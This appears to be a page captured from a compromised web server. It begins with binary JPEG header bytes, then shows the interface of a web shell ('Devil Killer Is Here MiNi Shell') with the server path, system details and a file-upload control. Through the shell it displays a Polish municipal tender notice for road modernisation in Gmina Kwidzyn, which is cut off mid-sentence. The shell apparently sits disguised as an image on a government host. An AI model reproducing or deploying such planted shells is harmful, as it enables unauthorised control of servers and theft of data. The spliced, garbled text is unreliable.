JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033939701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja dróg gminnych w 2022 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kwidzyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170747767</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Grudziądzka 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kwidzyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">552614173</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gminakwidzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminakwidzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> administracja samorządowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja dróg gminnych w 2022 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-242c9378-63c9-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00339397</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003480/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Modernizacja dróg gminnych w 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_kwidzyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gmina_kwidzyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne znajdują się w SWZ i w Regulaminie zamieszczonym na stronie internetowej: www.plaformazakupowa.pl w zakładce &#34;Regulamin&#34;</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określono w SWZ - Rozdz. II OCHRONA DANYCH OSOBOWYCH</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Określono w SWZ - Rozdz. II OCHRONA DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.14.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1: Modernizacja dróg gminnych z płyt jomb<br/>W ramach zadania należy wykonać nawierzchnie z płyt jomb na podsypce piaskowej, z korytowaniem oraz obsługą geodezyjną. <br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 128 300,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego.<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 120 000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne.<br/>Wykonawców prosi się o wycenę następujących pozycji:<br/>1)	1 m2 nawierzchni z płyt jomb,<br/>2)	remont nawierzchni drogi z płyt betonowych jomb - wymiana płyt na nowe – 1m2<br/>3)	remont nawierzchni drogi z płyt betonowych jomb - płyty z rozbiórki materiał inwestora – 1m2<br/>4)	1 m2 wykonania koryta o głębokości 1 cm i warstwy odsączającej – za każdy kolejny 1 cm grubości,<br/>5)	1 mb nowego krawężnika betonowego z ławą z oporem.<br/>Wszystkie roboty wymienione powyżej w punktach 1) – 5) rozliczane będą powykonawczo zgodnie <br/>z bieżącym zapotrzebowaniem po cenach jednostkowych.<br/><br/>Powyższy zakres obejmuje zarówno zakres podstawowy jak i zakres opcjonalny zamówienia. Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Powyżej określony zakres objęty prawem opcji przewidziany zostaje na okoliczność istnienia stosownych możliwości finansowych po stronie Zamawiającego w kontekście realizacji tego zakresu prac oraz uznania potrzeby ich wykonania (tzn. w zależności od potrzeb Zamawiającego). Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego prawa opcji zgodnie z zapotrzebowaniem i posiadanymi możliwościami finansowymi. Wskazana wyżej wartość robót objętych opcją stanowi maksymalny zakres zastrzeganego prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71315000-9 - Usługi budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość skorzystania z prawa opcji określonego w art. 441 p.z.p. Prawo opcji oznacza, że Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego na podstawie cen określonych w ofercie Wykonawcy stanowiącej załącznik do umowy, zaś zakres wartościowy objęty prawem opcji zostanie uruchomiony w zależności od potrzeb i posiadanych środków przez Zamawiającego zgodnie z następującymi zasadami:<br/>a)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe;<br/>b)	zakres opcjonalny przedmiotu umowy będzie realizowany w sposób analogiczny, jak zakres podstawowy, a zakresu opcjonalnego dotyczyć będą te same kwoty, warunki i zobowiązania umowne Wykonawcy (w tym zobowiązania z tytułu gwarancji i rękojmi), co przedmiotu umowy objętego zakresem podstawowym;<br/>c)	o zamiarze skorzystania z prawa opcji, Zamawiający poinformuje Wykonawcę odrębnym oświadczeniem.<br/>2.	Warunkiem uruchomiania prawa opcji jest złożenie przez Zamawiającego w okresie obowiązywania umowy pisemnego oświadczenia określającego zakres konkretnych robót (zakres opcji). Realizacja (uruchomienie) opcji (zakresu opcjonalnego przedmiotu umowy) nie stanowi zmiany warunków umowy i nie wymaga zawarcia aneksu do umowy.<br/>3.	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji niniejszej umowy. W przypadku nie skorzystania przez Zamawiającego <br/>z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>4.	Wykonawca nie jest obowiązany do realizacji zakresu opcjonalnego w zakresie, w jakim opcja nie została uruchomiona przez Zamawiającego zgodnie z zapisami umowy, jak również Wykonawca nie może domagać się jego realizacji. <br/>5.	Opcja może być realizowana przez Zamawiającego etapowo, częściowo, fragmentarycznie, sukcesywnie przy czym oświadczenie o skorzystaniu przez Zamawiającego z opcji (ewentualnie ostatnie z takich oświadczeń – w przypadku etapowego korzystania z opcji) może zostać złożone nie później niż do dnia 15.12.2022 r. Po upływie tego terminu opcja (w zakresie, w jakim nie została uruchomiona) wygasa, w związku z czym Zamawiający po upływie tego terminu nie może już z niej skorzystać.<br/>6.	W momencie złożenia oświadczenia o skorzystaniu z opcji następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej z zakresu robót budowlanych objętych realizowaną na mocy danego oświadczenia opcją.<br/><br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 128300,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego.<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 120000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z zapisami SWZ i postanowieniami Pzp</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: Modernizacja dróg i innych terenów publicznych<br/>Przedmiotem zamówienia są remonty dróg na terenie gminy Kwidzyn.<br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 329 700,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego.<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 250 000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne.<br/>W ramach zadania należy wykonać:<br/>1)	wykonanie chodnika z kostki betonowej grubość 8 cm<br/>2)	wykonanie chodnika z kostki betonowej grubość 6 cm<br/>3)	remont chodnika z płytek chodnikowych 50x50 - materiał inwestora,<br/>4)	wykonanie nawierzchni drogi z trylinki – płyty betonowe inwestora,<br/>5)	remont chodnika z kostki betonowej grubość 6 cm z odzysku,<br/>6)	remont chodnika z kostki betonowej grubość 8 cm z odzysku,<br/>7)	przełożenie nawierzchni z trylinki,<br/>8)	wykonanie krawężników betonowych na ławie betonowej z oporem,<br/>9)	remont krawężników na ławie betonowej z oporem - nowy krawężnik,<br/>10)	remont obrzeża betonowego – nowe obrzeże,<br/>11)	wykonanie obrzeży betonowych,<br/>12)	wykonanie nawierzchni z płyt ażurowych,<br/>13)	wykonanie nawierzchni z płyt ażurowych – materiał inwestora,<br/>14)	wykonanie chodnika z kostki betonowej grubość 6 cm z odzysku,<br/>15)	wykonanie chodnika z kostki betonowej grubość 8 cm z odzysku,<br/>16)	przełożenie nawierzchni chodnika z kostki betonowej grubość 6 cm – kostka z odzysku,<br/>17)	przełożenie nawierzchni chodnika z kostki betonowej grubość 8 cm – kostka z odzysku,<br/>18)	remont elementów odwodnienia dróg:<br/>a)	wymiana podłoża pod kanały i studnie<br/>b)	naprawa kolektora z rur pvc d=160<br/>c)	naprawa kolektora z rur pvc d=200<br/>d)	remont studzienki ściekowej d=500<br/>e)	remont studni rewizyjnej d=1000<br/>f)	remont studni rewizyjnej d=1200<br/>Wszystkie roboty wymienione powyżej w punktach 1) – 18) rozliczane będą powykonawczo zgodnie z bieżącym zapotrzebowaniem, po cenach jednostkowych.<br/>Powyższy zakres obejmuje zarówno zakres podstawowy jak i zakres opcjonalny zamówienia. Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Powyżej określony zakres objęty prawem opcji przewidziany zostaje na okoliczność istnienia stosownych możliwości finansowych po stronie Zamawiającego w kontekście realizacji tego zakresu prac oraz uznania potrzeby ich wykonania (tzn. w zależności od potrzeb Zamawiającego). Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego prawa opcji zgodnie z zapotrzebowaniem i posiadanymi możliwościami finansowymi. Wskazana wyżej wartość robót objętych opcją stanowi maksymalny zakres zastrzeganego prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">71315000-9 - Usługi budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega możliwość skorzystania z prawa opcji określonego w art. 441 p.z.p. Prawo opcji oznacza, że Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego na podstawie cen określonych w ofercie Wykonawcy stanowiącej załącznik do umowy, zaś zakres wartościowy objęty prawem opcji zostanie uruchomiony w zależności od potrzeb i posiadanych środków przez Zamawiającego zgodnie z następującymi zasadami:<br/>a)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe;<br/>b)	zakres opcjonalny przedmiotu umowy będzie realizowany w sposób analogiczny, jak zakres podstawowy, a zakresu opcjonalnego dotyczyć będą te same kwoty, warunki i zobowiązania umowne Wykonawcy (w tym zobowiązania z tytułu gwarancji i rękojmi), co przedmiotu umowy objętego zakresem podstawowym;<br/>c)	o zamiarze skorzystania z prawa opcji, Zamawiający poinformuje Wykonawcę odrębnym oświadczeniem.<br/>1.	Warunkiem uruchomiania prawa opcji jest złożenie przez Zamawiającego w okresie obowiązywania umowy pisemnego oświadczenia określającego zakres konkretnych robót (zakres opcji). Realizacja (uruchomienie) opcji (zakresu opcjonalnego przedmiotu umowy) nie stanowi zmiany warunków umowy i nie wymaga zawarcia aneksu do umowy.<br/>2.	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać w ramach realizacji niniejszej umowy. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>3.	Wykonawca nie jest obowiązany do realizacji zakresu opcjonalnego w zakresie, w jakim opcja nie została uruchomiona przez Zamawiającego zgodnie z zapisami umowy, jak również Wykonawca nie może domagać się jego realizacji. <br/>4.	Opcja może być realizowana przez Zamawiającego etapowo, częściowo, fragmentarycznie, sukcesywnie przy czym oświadczenie o skorzystaniu przez Zamawiającego z opcji (ewentualnie ostatnie z takich oświadczeń – w przypadku etapowego korzystania z opcji) może zostać złożone nie później niż do dnia 15.12.2022 r. Po upływie tego terminu opcja (w zakresie, w jakim nie została uruchomiona) wygasa, w związku z czym Zamawiający po upływie tego terminu nie może już z niej skorzystać.<br/>5.	W momencie złożenia oświadczenia o skorzystaniu z opcji następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej z zakresu robót budowlanych objętych realizowaną na mocy danego oświadczenia opcją.<br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 329 700,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego.<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 250 000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z zapisami SWZ i postanowieniami Pzp</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3: Utwardzanie nawierzchni dróg śródpolnych<br/>Przedmiot zamówienia obejmuje utwardzanie dróg gminnych poprzez dostawę i rozłożenie gruzu bądź pospółki na terenie gminy Kwidzyn.<br/>Wartość planowanych robót objętych zamówieniem podstawowym oszacowana została na kwotę 156 500,00 zł brutto. Zamawiający zobowiązuje się zrealizować minimalny zakres zamówienia w wysokości 50% szacunkowej wartości zamówienia podstawowego .<br/>Wartość planowanych robót objętych zamówieniem opcjonalnym oszacowana została na kwotę 100 000,00 zł brutto i jest to maksymalna wartość, do której Zamawiający może zrealizować zamówienie opcjonalne.<br/>Wykonawców prosi się o wycenę następujących pozycji:<br/>1)	1 m2 rozłożonego gruzu o średniej grubości 15 cm i frakcji do Ø 0,63 mm,<br/>2)	1 m2 rozłożonej pospółki o średniej grubości 15 cm, <br/>3)	1 m2 rozłożonej podsypki piaskowej o średniej grubości 10 cm .<br/>Wszystkie roboty wymienione powyżej w punktach 1) – 3) rozliczane będą powykonawczo zgodnie z bieżącym zapotrzebowaniem po cenach jednostkowych za 1 m2.<br/>Powyższy zakres obejmuje zarówno zakres podstawowy jak i zakres opcjonalny zamówienia. Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Powyżej określony zakres objęty prawem opcji przewidziany zostaje na okoliczność istnienia stosownych możliwości finansowych po stronie Zamawiającego w kontekście realizacji tego zakresu prac oraz uznania potrzeby ich wykonania (tzn. w zależności od potrzeb Zamawiającego). Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego prawa opcji zgodnie z 